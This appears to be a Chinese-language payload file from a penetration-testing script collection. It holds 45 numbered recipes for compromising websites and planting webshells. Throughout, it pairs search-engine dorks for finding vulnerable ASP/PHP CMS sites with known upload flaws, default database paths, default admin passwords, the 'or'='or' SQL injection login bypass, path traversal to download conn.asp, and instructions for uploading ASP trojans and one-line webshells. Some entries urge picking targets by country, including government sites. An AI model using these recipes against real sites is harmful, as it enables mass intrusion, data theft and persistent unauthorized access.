PenetrationTestingScripts/payloads/other/gain-webshell

241 lines
6.3 KiB
Plaintext
Raw Blame History

This file contains invisible Unicode characters!

This file contains invisible Unicode characters that may be processed differently from what appears below. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to reveal hidden characters.

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

#gainwebshell
1中国黑客部教程首先到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
2到Google ,site:cq.cn inurl:asp
3,利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4,关键字Co Net MIB Ver 1.0网站后台管理系统
帐号密码为 'or'='or'
5.动感购物系统
inurl:help.asp登陆如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个一般管理员都忽视了这2漏洞
6。默认数据库地址blogdata/acblog.asa
关键字acblog
7.百度 /htdocs
注册里可以直接上传asa文件
8./Database/#newasp.mdb
关键词NewAsp SiteManageSystem Version
9.用挖掘机
关键字Powered by WEBBOY
页面:/upfile.asp
10.baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)
11.Upfile_Article.asp bbs/upfile.asp
输入关键字powered by mypower
12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
13.现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14.键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
15.VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了
16.shopping cart
1.打开百度或GOOGLE搜索输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb不能下载。
那样把前一个''store/''除去再加上database/comersus.mdb 试试
17.无忧传奇官方站点程序。
1、后台管理地址http://您的域名/msmiradmin/
2、默认后台管理帐号msmir
3、默认后台管理密码msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp
18.百度里输入/skins/default/
19.利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用
20.上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp
21.新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
22.通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.注射漏洞
百度搜索ioj's blog
24动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.manage/login
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'
26.入侵魔兽私服
需要的工具ASP木马一只。
Domain3.5明小子
关键字All Right Reserved Design:游戏联盟
后台地址admin/login.asp
数据库的地址chngame/#chngame.mdb
27.漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
28.国外站的爆库漏洞
关键字sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
29.Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intextiscuz! 4.1.0"
30.关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马
31.工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能否则您将不能登录
插入diy.asp
32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到 在 config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径
36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字owered byCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp
38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.
39.
关键字ower System Of Article Management Ver 3.0 Build 20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
40.
一、通过GOOGLE搜索找大量注入点
关键字asp?id=1 gov.jp/ asp?id=
页数100
语言:想入侵哪个国家就填什么语言吧
41.
关键字Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入
默认数据库地址atabase/DataShop.mdb
43.
关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马
44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
45.
关键字程序核心BJXSHOP网上开店专家
后台:/admin